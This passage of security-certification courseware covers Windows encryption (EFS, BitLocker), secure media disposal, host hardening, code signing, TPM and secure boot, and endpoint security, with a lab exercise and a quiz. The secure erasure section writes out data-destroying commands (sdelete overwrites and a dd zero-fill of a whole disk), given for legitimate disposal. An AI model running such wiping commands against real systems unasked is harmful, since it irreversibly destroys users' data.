included with Business/Professional/Enterprise/Ultimate editions of Windows, as well as all editions of
Windows Server.
 BitLocker encrypts entire volumes, such as the system drive or even removable drives. It is available on
Enterprise and Ultimate Editions of Windows Vista and 7, Pro and Enterprise versions of Windows 8
and later, and all editions of Windows Server 2008 and later.

It's not a matter of which is better, and even if both are available you'll find that they have different
requirements and serve different purposes. Depending on your needs, you might prefer one or even use both
together.
 EFS is intended for personal files and folders, while BitLocker protects entire drives with personal and
system files alike.
 EFS-encrypted files are unreadable to other users on the same computer. All users on a BitLocker-
encrypted system can access the full system, subject to normal user permissions.
 Any user can independently encrypt files using EFS, while BitLocker must be enabled for the entire
computer by an administrator.
 Each user account has a separate EFS key stored in its settings, and decryption operates transparently
from that user's perspective. BitLocker uses a key for the entire system which must be supplied on
system startup.

In modern versions of Windows, both EFS and BitLocker use strong encryption, so if you lose the key your
files might be gone forever. You can export both EFS and BitLocker keys for backup purposes, or assign them
to data recovery agent accounts on a domain. In Windows 8 and later, BitLocker keys can also be stored on a
Microsoft account for recovery.

Encrypting files and folders


You can encrypt personal files or folders from the Advanced Attributes window in Windows Explorer.

1. In Windows Explorer, right-click the file or folder and choose Properties.


2. Click Advanced.
3. In the Advanced Attributes window, check Encrypt contents to secure data.
4. Click OK twice.
• If you encrypted a file you'll be asked whether you want to encrypt the file alone, or its entire parent
folder.
• If you encrypted a folder, you'll be asked whether you want to encrypt the folder alone, or all of its
subfolders and files.
5. Choose the option you want and click OK.

Encrypted file and folder names are green in Windows Explorer.

The first time you use EFS, you'll be prompted to back your key up. You can also back it up at any time by
entering the User Accounts window and clicking Manage your file encryption certificates.
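You can also manage EFS from the command line with the cipher tool; the folder path and backup file name
below are just examples:

    rem Encrypt a folder and everything beneath it with EFS
    cipher /e /s:C:\Users\Jake\Documents\Private
    rem Decrypt it again if needed
    cipher /d /s:C:\Users\Jake\Documents\Private
    rem Back up the current user's EFS certificate and private key to a password-protected .pfx file
    cipher /x efskey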

BitLocker and BitLocker-To-Go


BitLocker is an entire volume encryption feature included with Windows Vista and Windows 7 Ultimate and
Enterprise editions, and Windows 8 and higher Professional and Enterprise editions. Encrypting the entire
volume protects all of the volume's data, including operating system files, the Windows registry, all temporary
files, and the hibernation file, ensuring the integrity of the trusted boot path (BIOS, boot sector, etc.) and
protecting against boot sector malware.
By default, BitLocker uses a TPM installed in the motherboard. Without the decryption keys, an attacker can't
steal your data by removing your drive, installing it in another computer, and accessing the data. You can add
additional authentication using a USB key or a PIN.
BitLocker can also be used without a TPM. However, you must change the default behavior of BitLocker
either through a group policy or script. When BitLocker is used without a TPM, the encryption keys are
stored on a USB flash drive. This drive must be inserted into the computer to unlock the data stored on the
disk.
BitLocker requires at least two NTFS-formatted volumes: one for the operating system (usually C:) and a
smaller boot volume with a minimum size of 100 MB. The boot volume must be unencrypted. A volume can
be an entire physical drive, just a portion of a physical drive, or can span one or more physical drives. On
Windows Vista you must assign this volume a drive letter, but the drive letter isn't required on Windows 7 and
above.
There are three ways BitLocker can authenticate:
 Transparent operation mode where the user starts up the computer and logs into Windows as normal.
During computer boot, BitLocker verifies that the boot files have not been tampered with. If the boot
files are unmodified, the TPM releases the encryption key and allows the system to boot and load the
operating system. This all happens behind the scenes and is transparent to the user.
 User authentication mode where the user starts up the computer and is prompted to provide a pre-boot
PIN or password. If the user can provide the PIN or password, the system is allowed to boot and load
the operating system.
 USB key mode where the user inserts a USB device containing a startup key into the computer. This
allows the system to boot and load the operating system. For this mode to work, the BIOS must be able to
read USB devices in the pre-boot environment.

BitLocker-To-Go extends the BitLocker encryption feature to removable devices, such as external hard drives
or USB flash drives.
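BitLocker can also be managed from an elevated Command Prompt with the manage-bde tool. A minimal sketch,
assuming C: is the operating system volume and E: is a removable drive:

    rem Check which volumes are protected and how far encryption has progressed
    manage-bde -status
    rem Add a recovery password protector, then turn BitLocker on for the system volume
    manage-bde -protectors -add C: -RecoveryPassword
    manage-bde -on C:
    rem Encrypt a removable drive with BitLocker To Go, unlocked by a password
    manage-bde -on E: -Password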

Exercise: Enabling BitLocker


On a computer with a TPM it's easy to enable BitLocker from the Control Panel. If you don't have one, you'll
need to configure it in Local Security Policy, and store the key on a removable drive.

Do This How & Why

1. On the Windows 7 VM, open Local Group Policy.
   Local Group Policy contains various system security settings, including for BitLocker.

   a) In the Run box, type group.

   b) In the results list, click Edit group policy.
      It may take a few moments, but the Local Group Policy Editor will open.

2. Edit BitLocker settings.

   a) In the left panel, navigate to Computer Configuration > Administrative Templates > Windows
      Components > BitLocker Drive Encryption > Operating System Drives.

   b) Double-click Require additional authentication at startup.
      The first setting on the right. A window pops up with settings, options, and help for the
      option. By default, BitLocker is only allowed with a compatible TPM.

   c) Click Enabled.
      Allow BitLocker without a compatible TPM is checked.

   d) Click OK.
      You'll need to reboot Windows to see changes.

3. Reboot the Windows 7 VM.

4. Configure BitLocker.

   a) In the search box, type bitlocker.

   b) Click BitLocker Drive Encryption.

   c) Click Turn On BitLocker.
      Windows tests to see if your system is compatible with BitLocker. After a little while, the
      BitLocker Drive Encryption window appears.

   d) Click Next.
      The next screen warns you that a new system drive will be created, that you should back up
      your data, and that the process might take a while.

   e) Click Next, then Restart Now.
      Note: If you're prompted to format a new drive on restart, do not do it.

   f) When Windows restarts, click Next in the BitLocker Drive Encryption window.
      Since the VM doesn't have a TPM, you'll need a USB drive to store your startup key instead.
      That's a bit of a pain on a VM, so you won't actually install it.

   g) Click Cancel, then click Yes.
      If you like and you have a USB key, your instructor can walk you through the rest of the
      process instead.

Secure media destruction


Data, and its storage media, can be most vulnerable when you throw it away. If data is worth securing in the
first place, it has to be disposed of in a secure fashion as well. For the simplest example, imagine paper
documents holding company secrets. If you just throw them away when you're done someone might literally
dig them out of the trash and make off with them. Instead, you should make sure they're safely shredded. In
fact, for very sensitive documents, shredding often isn't enough, since someone sufficiently motivated could
still reassemble them. Organizations with strict document disposal policies might use more irreversible
methods:

Exam Objective: CompTIA SY0-501 5.8.1, 5.8.5

Pulverizing Hydraulic or pneumatic processing that reduces documents or other items to loose fibers.
Pulping Paper recycling processes that reduce documents to a liquid slurry and separate the ink from
the fibers.
Incineration Burning documents into unrecognizable ash.

The same thing is true of digital media. Not only can valuable files remain on a discarded CD, flash drive, or
hard drive, but the firmware on a computer, router, or other device might have system configuration or other
data useful to an attacker. Even a "failed" hard drive that's no longer accessible by your computer usually has
platters full of readable content that a data recovery lab can easily retrieve. The surest way to ensure the data
is destroyed is to destroy the media or device itself, and the best way to accomplish this depends on the media
and your resources.
 Optical discs are rather fragile: not only can some consumer shredders destroy them, you can also cut
them up with scissors, use something rough or sharp to scratch the upper metallic layer that stores data,
or even put them in the microwave for a flashy, if potentially unsafe, show.
 Backup tapes can be thoroughly destroyed by tape shredders or incineration, though since some media
releases toxic chemicals when burned the latter may be forbidden by local regulation.
 Degaussers use powerful electromagnets to destroy all data on magnetic media like tapes and hard
drives, but not optical or flash storage. Some media can be easily reused after degaussing, but others,
like most hard drives, require specialized tools to reformat.
 Industrial shredders or pulverizers can destroy flash drives, hard drives, or even entire computers.
 Simple hammers and drills can easily destroy flash chips or hard drive platters. With hard drives, it's
usually easier if you first open the drive cover with a Torx driver.

If you have a lot of media to destroy, it might require a lot of work or specialized equipment. An alternative is
to hire a data destruction service: many offer on-site services and provide certificate of destruction documents
for legal liability or regulatory compliance.

Securely erasing data


If your security needs aren't that extreme, you might not want to destroy expensive erasable media that can be
repurposed, resold, donated, or otherwise recycled. In general, you can do this safely, but you need to use
secure procedures to purge or wipe the original data in a way that makes it genuinely inaccessible.

Exam Objective: CompTIA SY0-501 2.2.8


This isn't as easy as it sounds. Imagine you want to delete some private files from your hard drive before
selling your computer to a somewhat untrustworthy acquaintance. If you just delete them, they might go to the
Recycle Bin where they're easily restored. Even if you empty the Recycle Bin, that only removes the file
system's pointer to the data location: if it's not written over by new files, data recovery software could find
and restore it. Even a quick drive reformat only replaces the file system, not the underlying data. Software
rated for data sanitization is the only real option to make sure the device is clear.
In the end, the only way to be really sure data is gone from a storage device is to make sure that every single
bit of it is overwritten with new data, even if it's just writing a string of zeros. For additional security you can
overwrite the same data multiple times, but it takes more time and is best suited for information sensitive
enough that you might rather physically destroy the drive.

 Before erasing any data, make sure that it's safe to delete both in terms of business needs and regulatory
compliance.
 To securely erase files on an active computer, install a secure deletion program. Popular options include
SDelete, CCleaner, Eraser, and File Shredder; see the example commands after this list. Some will also
overwrite all free space on your hard drive, allowing you to ensure that previously deleted files are gone forever.
 To securely erase an entire hard drive, you'll need a formatting tool that overwrites the entire drive. For
large drives, this can be a time-consuming process.
• Some drive utilities from manufacturers or third party vendors can perform a low-level format which
writes zeroes to the entire drive and restores it to its newly installed configuration. Historically, a true
low level format also defined the tracks and blocks drives use to store data. On today's drives this isn't
generally possible outside the factory, but the term is commonly used for anything that operates
"below" the high level format of the operating system.
• Data destruction utilities can achieve the same result, and usually have other features oriented toward
data disposal rather than drive diagnostics. Examples include DBAN, HDShredder, and KillDisk.
• Drives protected with full disk encryption are easy to securely erase. Securely deleting or overwriting
the encryption key will render all existing files unreadable.
 In order to maximize the limited lifespan of flash memory, SSDs move data around as it's written and
deleted. The details aren't important, but an unfortunate side effect is that it makes it difficult to be sure
any particular data is really gone. Some SSD manufacturers offer utilities for secure drive wiping.
 Firmware and settings in computer hardware, network appliances and mobile devices can hold valuable
information. Consult documentation for the device to see if it can be securely deleted, or simply destroy
the device.
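As example commands (the file and drive names are placeholders), SDelete handles individual files and free
space on Windows, while dd can overwrite an entire drive on Linux:

    rem Overwrite a file, then a whole folder tree, with three passes each
    sdelete -p 3 C:\Secret\plans.docx
    sdelete -p 3 -s C:\Secret
    rem Clean the free space on a volume so previously deleted files can't be recovered
    sdelete -c C:

    # On Linux, overwrite an entire disk with zeros; double-check the device name first
    sudo dd if=/dev/zero of=/dev/sdX bs=1M status=progress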

Discussion: Secure data disposal


1. What policies does your organization have for data disposal?
Answers may vary.
2. What tools do you or your organization have at hand to securely destroy paper documents or digital
media?
Answers may vary.
3. You want to sell or donate a computer that held sensitive data. Why might reformatting the drive not be
enough to satisfy secure disposal goals?
A quick format can leave readable data, and even full formatting of an SSD might leave readable sectors.
You need to perform a secure data purge. Additionally, you need to make sure no device firmware settings
contain confidential configuration details.

Assessment: Securing data


1. Which Windows encryption tool can protect the entire system volume? Choose the best response.
 BitLocker
 Encrypting File System
 Both
 Neither

2. Your organization has a degausser in the basement. What media can you use it to securely destroy?
Choose all that apply.
 Backup tapes
 CDs and DVDs
 Hard drives
 Paper documents
 SSDs

3. What cryptographic tool is commonly built into a motherboard?


 FDE
 DLP
 HSM
 TPM

4. What might protect users from copying sensitive files to external media?
 FDE
 DLP
 HSM
 TPM

5. "Big data" shouldn't be confused with "cloud storage"? True or false?


 True
 False

6. Your organization has a critical database full of customer PII, and a new employee was just authorized to
use it. How would you best describe the role of the system administrator who configures user permissions
in the database software?
 Data custodian
 Data owner
 Data steward
 Privacy officer

Module B: Securing hosts


Every host on your network needs to be kept secure regardless of the data it holds. The value of servers is
obvious for security, but workstations are the systems most often exposed to malware infestations, and most
easily compromised by user error. Many users, home or business, might say "but my computer doesn't have
valuable information, I don't care if the hackers get at it." It's a dangerous attitude: even such a computer
likely has user credentials, saved passwords, and personal information that can be stolen and used elsewhere.
Even if it doesn't, spyware can capture credentials when the user logs onto a company server or bank website.
Even without data breaches, compromised systems are time-consuming to fix, so preventative maintenance is
an effective use of resources.
You will learn:
 About security baselines
 How to secure hosts
 How to perform patch management
 How to secure static and unconventional systems

Security baselines
Much as with data or anything else, securing hosts begins with designing policies that meet your security
needs but are practical to support. You should define a security baseline, or minimum set of standards. Every
host you deploy must be configured to meet the baseline, and any later changes must be reviewed to make
sure security doesn't fall below the baseline. You can't rely on the state of a system out of the box to meet a
security baseline either. Most hardware and software products have a default configuration intended to make
them easy to set up and use in a safe environment, even including things like a default administrator account
and password anyone can look up online.

Exam Objective: CompTIA SY0-501 1.6.5, 1.6.6, 2.3.11, 3.3.2.5


Much like with network segments or data, you might configure multiple security baselines for hosts that have
different security needs. Most likely a workstation and a server will have different baselines, or one on an
internal network vs. one on the perimeter. Areas a baseline might define include the following:
 Operating system configuration
 Host-based firewall and IDS software and settings
 Antimalware software
 Required and disallowed applications
 Application security settings
 Patches and updates
 Physical security
 User training procedures

Since system configurations have a way of changing or falling out of sync when you're not looking, security
audits and evaluations should ensure that all hosts still meet the baseline. There are automated tools you can
use to verify some baseline features. For example, Microsoft Baseline Security Analyzer checks a variety of
Windows components and Microsoft products at once to make sure they're up to date and securely configured.
It can also be used to scan other computers on the network.
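Beyond dedicated tools, you can script simple spot checks of baseline items yourself. Here's a minimal
sketch using built-in PowerShell cmdlets on a recent Windows system with Windows Defender; the items checked
and their expected values would come from your own baseline document.

    # Is the Windows firewall enabled for each network profile?
    Get-NetFirewallProfile | Select-Object Name, Enabled
    # Is Defender's real-time protection on, and are its signatures current?
    Get-MpComputerStatus | Select-Object AMServiceEnabled, RealTimeProtectionEnabled, AntivirusSignatureLastUpdated
    # What updates were installed most recently?
    Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10
    # Which automatic services aren't actually running?
    Get-Service | Where-Object { $_.StartType -eq 'Automatic' -and $_.Status -ne 'Running' }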

When you have a number of identical systems to deploy, a good way to save time is to create a single system
image configured to the security baseline, and install it to all hosts.

Code signing
Maliciously or carelessly modified software is always a risk, and it can happen on any level. Applications,
drivers, operating systems, and firmware all can be modified by malware or directly by an attacker. The risk is
highest with user-installed applications, but even when you're installing a driver or booting up your operating
system you probably want to be sure it's unmodified and comes from who it claims it does.

Exam Objective: CompTIA SY0-501 2.4.3, 3.6.5.5


A popular solution is code signing, which uses a digital certificate to cryptographically sign code. Whoever
wants to run it can then use the signature to verify the creator of the program and that it hasn't been changed
since it was signed. Most code signing systems allow developers to sign all protected executables and
libraries when they're built, before they're distributed. Before installing or running signed code, the host system can
verify its signatures to make sure that they're trusted.
Most modern operating systems allow checking for code signatures, and it's strong security when properly
implemented, but you should also know its limitations.
 A signature doesn't verify that software is safe, only that the signer claims it is safe. Only trust
signatures when they come from sources that you trust.
 Private signing keys can be compromised. Even if a compromised certificate has been revoked, you'll
need network access to a CA to be certain of it.
 Code signing only gives protection if the operating system is configured to check for signatures. Even
then, depending on system security policies users may be permitted to run unsigned code or code from
untrusted sources. Stricter security settings can block software from running if it isn't signed by an
approved publisher.
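For example, in Windows PowerShell you can inspect the Authenticode signatures on files you've downloaded or
deployed; the paths below are hypothetical:

    # Check the publisher and validity of an installer's digital signature
    Get-AuthenticodeSignature C:\Downloads\setup.exe | Format-List SignerCertificate, Status, StatusMessage
    # List any DLLs in an application folder that aren't validly signed
    Get-ChildItem 'C:\Program Files\ExampleApp' -Filter *.dll |
        ForEach-Object { Get-AuthenticodeSignature $_.FullName } |
        Where-Object { $_.Status -ne 'Valid' } |
        Select-Object Path, Status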

Trusted hardware and firmware


One of the primary rules about attacks of any kind is that there's no reason to attack a security control head-on
when you can avoid it, or infiltrate it from a trusted direction. On the host level, this often means exploiting
vulnerabilities that give low-level, privileged access to sensitive functions. Since higher abstraction layers
tend to trust lower abstraction layers, compromising a low-level component allows easy attacks against higher
layers. For example, rootkits are so dangerous because they can subvert the operating system and application
security controls that could catch other malware, and backdoors because they bypass existing access control
measures. Especially with physical access, an attacker can modify a computer's operating system or firmware
without its user's knowledge, preventing it from enforcing other security policies.

Exam Objective: CompTIA SY0-501 3.3.1.4, 3.3.1.5, 3.3.1.6, 3.3.1.7, 3.4.4


Creating a trusted system that can be relied on to enforce security from the hardware up isn't entirely easy.
You can use code signing to make sure the operating system verifies the applications you run and drivers you
load, but what verifies that the operating system hasn't been modified? Fundamentally, every trust chain goes
back to a root of trust, a certificate or other form of authentication. For secure websites and web applications,
the root of trust is the root CA certificates installed with your browser. For local applications, the root of trust
can be in the operating system's certificate store. But to protect the operating system itself, the root of trust
must be embedded into the hardware or firmware.
One approach rootkits often take is to compromise the boot loader to take control at the lowest level. To
prevent this, UEFI supports a feature called secure boot, which relies on a public platform key (PK) stored in the
firmware itself and serving as a root of trust for the operating system and drivers. With secure boot enabled,
the computer will refuse to use any bootloader that isn't signed by the PK's owner. The PK is also used to
verify signatures on device drivers, though the operating system can still be configured to allow unsigned
drivers. Most commercial motherboards are shipped with a Microsoft PK that supports Windows and a
handful of Linux distributions with secure boot support. If you want to use other operating systems or just to
really own your root of trust, you can replace the PK with one of your own. This means you'll need to sign
the bootloader and drivers yourself.
A TPM installed onto a motherboard is an even more secure and flexible root of trust. The TPM not only
stores keys in protected hardware and supports more of them than UEFI does, but it also supports a number of
other cryptographic functions that can be used to authenticate operating systems and other software.
 With a built-in cryptoprocessor and key generation functions, a TPM can be used to contact external
servers and provide remote attestation that software is genuine. This can work multiple ways. In one
direction, if software you want to run isn't directly trusted by a TPM key, it can be verified against an
external server which the TPM trusts. In the other direction, the TPM can verify the signatures of
software on the local machine as part of a network authentication process like joining a VPN. Then it
can provide hardware-level authentication that the client machine has not been compromised.
 Using cryptographic features and secured storage, the TPM can perform more complex integrity
measurement to verify not only that individual pieces of software are signed but that combinations of
software and configuration inputs all match an established baseline. To do so it creates a hash of the
combination of all of these factors, verifying it against a stored value or a remote authenticator.
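
To make the idea of integrity measurement more concrete, the sketch below imitates, in plain Python rather
than against real TPM hardware, the extend operation used to build such a measurement: each component is
folded into a running hash, so the final value matches the stored baseline only if every measured input, and
its order, is unchanged. The component names are purely illustrative.

# Illustrative sketch of TPM-style "extend" measurements in ordinary Python.
# A real TPM performs this in hardware against its Platform Configuration
# Registers; this only shows why any change to any input changes the result.
import hashlib

def extend(register, measurement):
    """Fold a new measurement into the running register value."""
    return hashlib.sha256(register + hashlib.sha256(measurement).digest()).digest()

def measure_chain(components):
    register = b"\x00" * 32            # registers start out zeroed
    for blob in components:
        register = extend(register, blob)
    return register

# Hypothetical boot components; in practice these would be the actual
# bootloader, kernel, drivers, and configuration data.
baseline = measure_chain([b"bootloader-v1", b"kernel-5.10", b"config-A"])
current = measure_chain([b"bootloader-v1", b"kernel-5.10", b"config-B"])
print("Matches baseline:", current == baseline)    # False: one input changed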

Finally, it's always possible that firmware itself could be compromised, especially but not exclusively when
you're dealing with industrial or embedded systems. In extreme cases, attackers could install hardware
keyloggers or other physical devices. While this isn't a very likely attack, if you're really serious about
security you need to make sure your supply chain is secure. If there's any possibility of modification before a
device reaches you, or when it's been left unsecured, you must verify that hardware and firmware haven't been
modified.

Trusted operating systems


By securely configuring host operating systems, you can greatly reduce their attack surface. The first step is
choosing an operating system that's designed securely in the first place. Governments typically publish
trusted operating system (TOS) standards for operating system security. TOS standards tend to require strong
authentication and authorization features that control both user and application privileges, with an end goal of
least functionality. Restrictive as that sounds, it's just another form of least privilege: any function a legitimate
user does not need might be more useful to an attacker.

Exam Objective: CompTIA SY0-501 3.3.2.4, 3.3.2.6


The most common TOS standard is the Common Criteria (CC) defined by ISO 15408. It rates operating
systems by a numerical Evaluation Assurance Level (EAL), ranging from 1 to 7. A typical well-secured
commercial operating system is EAL 4: legacy or low-security operating systems are lower, while higher
levels are reserved for specialized high-security applications. For example, some of the newest military jets
use computers with EAL 6 operating systems.

Hardening operating systems


A trusted OS has strong security features, but only when it's correctly configured. When deploying a system,
take steps to make sure it's hardened out of the box, and correct it if it's not. While the overall principles of
hardening hosts are universal, the details depend on the operating system and version as well as what you plan
to use it for. The same physical computer might be used for a workstation, a server, or even a network
appliance. What's more, the three could be different operating systems, or just the same operating system
configured in three different ways.

Exam Objective: CompTIA SY0-501 3.3.2.1.1, 3.3.2.1.2, 3.3.2.1.3, 3.3.2.3

 Ensure that the operating system version is still supported and regularly receiving security updates. Even
if legacy operating systems were securely designed at the time, they can be a security risk as threats
evolve.
 Enable and enforce account control features.
• Restrict privileged and administrator accounts to users who actually need them. In particular, ordinary
desktop users should not have administrator rights.
• Restrict or disable remote access to administrator accounts.
• Disable unnecessary accounts such as guest or user accounts.
• Enable account security features for remaining accounts.
 Use access control features to control file access.
• Verify that file permissions are correctly set for system folders, as well as those holding sensitive data.
• Use only secured network shares where necessary.
• Disable AutoPlay or other features that automatically run executable files on removable media.
 Disable unnecessary services. Ideally, you should go through the entire list of running programs,
Windows services, Linux daemons, or whatever software is operating on the system, and ensure that all
of it is necessary for normal use.
• In particular, disable network services that aren't normally needed.
• Commercial systems often include third-party software which should be uninstalled.
 On larger networks use directory services for central account management and system monitoring, such
as Windows domains with Active Directory.
 Ensure that operating systems are kept up to date. Either configure individual hosts to automatically
install security updates regularly, or use centralized patch management software to keep all systems
updated at once.
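
As one hedged illustration of the "disable unnecessary services" step above, the Python sketch below lists
listening TCP ports on a Linux host by running the ss utility and flags anything not on an expected list. The
expected ports are placeholders that must be adapted to the host's actual role, and the parsing assumes ss's
usual column layout.

# Rough audit sketch: flag listening TCP ports that aren't on an approved list.
# Assumes a Linux host with the ss utility installed; EXPECTED_PORTS below is
# illustrative only.
import subprocess

EXPECTED_PORTS = {22, 443}     # e.g. only SSH and HTTPS should be listening

def listening_ports():
    out = subprocess.run(["ss", "-tlnH"], capture_output=True, text=True, check=True)
    ports = set()
    for line in out.stdout.splitlines():
        fields = line.split()
        if len(fields) >= 4:                  # local address is the fourth column
            port = fields[3].rsplit(":", 1)[-1]
            if port.isdigit():
                ports.add(int(port))
    return ports

if __name__ == "__main__":
    unexpected = sorted(listening_ports() - EXPECTED_PORTS)
    if unexpected:
        print("Review these unexpected listening ports:", unexpected)
    else:
        print("No unexpected listening ports found.")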


Securing peripherals
When you secure computers, remember that peripherals attached to them can be subject to or involved in
attacks.

Exam Objective: CompTIA SY0-501 2.4.6, 3.3.3, 3.9.18

 To control what peripherals can be attached to a workstation, disable access to external ports or use
computer and user policies to restrict use of unauthorized peripherals.
 External storage devices are both a common malware vector and an easy data exfiltration tool. In highly
secured areas you might want to forbid them entirely; in lower-security areas, restrict them with computer
and user policies.
 Some SD cards have a built-in Wi-Fi adapter. This means that not only do they have the risks of any
external storage device, they have the risks of a wireless adapter.
 Digital cameras are a double threat. Not only can they be used to photograph sensitive documents and
other visual data, but they double as external storage devices. Wireless models can even be used to
access networks.
 Wireless devices such as keyboards and mice are not only subject to electromagnetic interference, but if
they use insecure protocols it's possible for attackers to spy on input or remotely access the computer.
• Bluetooth devices use encrypted connections for built-in security, but you still need to be aware of
what devices are paired with any Bluetooth-enabled computer. You also need to be aware of Bluetooth
attacks.
• Non-Bluetooth wireless devices tend to use a variety of proprietary protocols. Most have weak or no
encryption so are easy for an attacker to eavesdrop on or manipulate.
 Shoulder-surfing is a risk when using any display where someone can see it.
• Be careful when viewing sensitive information in public on a laptop or mobile device.
• Where relevant, position workstation displays so visitors not authorized to see displayed content
cannot see the screen. This is especially important at medical reception desks or other places
employees need to view sensitive information around unauthorized people.
• Privacy filters or screen filters are screen coverings that reduce display viewing angles, so that the user
can still see normally but other people leaning in cannot.

Securing applications
The most important software to harden consists of the web applications used on critical servers, but even on
an ordinary workstation, installed software can easily compromise security. Not only do you need to ensure that
all installed applications are securely configured, you need to decide what applications users can run. There
are two primary approaches, which you can apply either by user policies or technical controls.

Exam Objective: CompTIA SY0-501 2.3.10, 2.3.12, 2.4.5, 3.3.2.7

Blacklisting Uses a list of software which is not allowed for use, such as malware or other known problem
applications. Applications not on the blacklist are presumed safe to run. Antivirus scanners are
an example of blacklisting software: the scanner maintains a list of known malware and blocks
it from running if detected.
Whitelisting Uses a list of approved software which users can run. If software is not whitelisted, it is
presumed to be forbidden. Many mobile devices employ whitelisting by only allowing
applications to run if they're digitally signed by a trusted application store. You can also
employ simple whitelisting by only letting users install applications by administrator approval,
but there are third-party solutions to give more detailed control.
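
The snippet below is a minimal sketch of the whitelisting idea: a file is allowed to run only if its SHA-256
digest appears on an approved list. Real solutions (publisher signatures, OS policy engines, third-party
endpoint tools) are far more capable; the digest list and the example path here are placeholders.

# Minimal hash-based whitelisting sketch. ALLOWED_SHA256 would be built from
# known-good installers; the commented entry below is a placeholder, not a real digest.
import hashlib
from pathlib import Path

ALLOWED_SHA256 = {
    # "0123abcd...": "approved_app.exe",
}

def sha256_of(path):
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_allowed(path):
    """Permit execution only if the file's digest is on the approved list."""
    return sha256_of(Path(path)) in ALLOWED_SHA256

# Hypothetical usage:
# print(is_allowed("C:/Program Files/App/app.exe"))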


Whether your fundamental application controls are blacklisting or whitelisting, and enforced by policies or
technology, you need to make sure they're carefully configured to avoid introducing security vulnerabilities.

 Ensure that applications are installed in compliance with their license agreements. Failure to do so could
cause application failure, update failure, or legal liability.
 When choosing between competing applications, review each option for known security weaknesses.
 Configure AAA features for any application which uses them in accordance with a unified security
policy, especially any providing network services.
 Disable network components for applications which do not need them.
 Web browsers and their add-ons are particularly susceptible to attack.
• Install browser updates whenever they are released.
• Configure security and privacy settings to be as strict as possible without interfering with normal use.
• Restrict add-ons and plugins that might compromise security, and keep them up to date. In particular,
the Flash and Java plugins are nearly as popular with malware creators as they ever were with website
and game designers.
 Apply heightened security to other network applications and their configuration settings.
• Instant messaging and file sharing applications are commonly used as attack vectors.
• Some applications have been known to include network servers or vulnerabilities that aren't apparent at
a quick glance.
• Avoid insecure protocols such as Telnet, TFTP, SLIP, and SNMPv1 and v2. FTP and HTTP are harder
to avoid, but still use unencrypted data and clear text credentials: use the SSL equivalents for both
when possible.
• Configure security and encryption options for secure protocols like SNMPv3, SSL, SSH, and so on.

Security software
Depending on the operating system, a newly-configured system might have quite a bit of software designed to
secure it against attacks, or you might need to install some yourself. Even if it does, you'll still need to ensure
that it's configured and updated properly. There are several types of software you should install in general, and
regulatory compliance for your particular organization might mandate more specific settings.

Exam Objective: CompTIA SY0-501 2.4.2, 2.4.7

Antivirus Every host should have an antivirus application with real-time monitoring enabled at all times
and kept up to date. In addition, it should be configured for weekly or even daily system scans
after hours. Windows 8 and later includes a version of Windows Defender with antivirus
capability, but many other free and commercial applications are available.
Firewall Every host should have a host-based firewall deployed, whether or not it is also protected by a
network firewall. Usually this will be a software application. At the minimum, the firewall
should be configured to block all ports not being used by important network applications.
Most operating systems include a firewall, but third party alternatives are available.
Anti-spyware Some antimalware software specializes in spyware or other threats rather than providing real-
time antivirus protection. For example, the version of Windows Defender found in Windows
7 and earlier was an anti-spyware application. These applications might find other threats that
traditional antivirus does not, but must be configured for scheduled scans instead of full-time
monitoring.

Pop-up Browsers are a major malware vector and also need to be hardened. One of the most
blocker effective tools is a pop-up blocker feature or add-on, which blocks pop-up windows that
may carry malware-laden ads or scripts, or simply annoy users.
Anti-spam Excessive spam can be annoying even outside of malware risks. If server side spam filters
aren't enough to control the problem, host-based anti-spam applications or even email client
filtering features can help. Typically antivirus programs also scan incoming mail for malware.
HIDS Host-based intrusion detection systems scan for changes in a system's security status, and
may also monitor against network intrusions. While this sounds similar to antivirus and
firewall software, HIDS is generally designed for protecting servers that host important
services or data. Examples include Tripwire, OSSEC, and Samhain.
File integrity Software that checks critical operating system or application files against a known baseline to
monitor detect any changes, typically by means of a cryptographic hash. File integrity checking can
also be used for archives, data transmitted over the network, or even configuration settings
that aren't intended to be changed frequently.
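
As a rough sketch of the file integrity monitoring described above, the Python below records SHA-256 hashes
of a few files as a baseline and later reports any that have changed or disappeared. The monitored paths are
examples only, and a real deployment would protect the baseline itself (for instance by signing it or storing it
offline) so an attacker can't simply rewrite it.

# Simplified file integrity check: compare current hashes against a baseline.
import hashlib
import json
from pathlib import Path

MONITORED = [Path("/etc/passwd"), Path("/etc/ssh/sshd_config")]   # examples only
BASELINE_FILE = Path("integrity_baseline.json")

def file_hash(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_baseline():
    baseline = {str(p): file_hash(p) for p in MONITORED if p.exists()}
    BASELINE_FILE.write_text(json.dumps(baseline, indent=2))

def check_baseline():
    baseline = json.loads(BASELINE_FILE.read_text())
    return [p for p, digest in baseline.items()
            if not Path(p).exists() or file_hash(Path(p)) != digest]

if __name__ == "__main__":
    if not BASELINE_FILE.exists():
        build_baseline()
        print("Baseline recorded.")
    else:
        changed = check_baseline()
        print("Changed or missing files:", changed or "none")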

In a small organization you might configure individual workstations with the security software they need, but
in a larger enterprise environment it's easiest to deploy centrally managed security suites. Popular examples
include Symantec Endpoint Protection, Kaspersky Total Security, and McAfee ePolicy Orchestrator. These
may also offer other features such as device encryption and backup.

Note: Keep security software up to date. Antimalware software in particular may have one or more
definition updates per day, and keeping them applied is critical for stopping new and rapidly spreading
threats.

Physically securing hosts


The most direct attack on any host is someone physically walking off with it, either to steal valuable hardware
or just to be able to crack it open at leisure for its sensitive data. Even without literally stealing the system,
privacy and physical access can allow an on-site attacker the ability to bypass authentication systems or
network controls. This should be less of a risk in areas with strong physical security, but when hosts are in
risky places, or are particularly high value targets, you should consider additional security.

 Cable locks are an effective deterrent against casual theft, even if they're less useful against determined attackers.
• Laptops and some other devices frequently have a standard Kensington security slot that a compatible
lock can plug into.
• You can also connect a cable to loops or adhesive security plates on desktop hardware.
• Ensure that the other end of the cable is securely affixed, or else a thief will have no trouble walking off
with the system anyway.
 Lockable desktop cases can prevent intruders from accessing hard drives or other internal hardware.
 Lockable cabinets can provide more complete security for hosts or other hardware.
• Active systems should only be stored in cabinets with adequate ventilation. Lockable server cabinets are
typically designed for this purpose, but a desk with a lockable cabinet can be a recipe for overheating
even if it's technically meant to hold a desktop.
• Cabinets, especially metal ones, can attenuate Wi-Fi signals. This can hurt network connectivity and
performance for WAPs or wireless adapters.
• Secure cabinets, or even safes, are ideal for portable and high-value equipment such as stored laptops,
backups, and external media.
 Don't forget the obvious social engineering approach. Someone walking down the hall with a desktop is
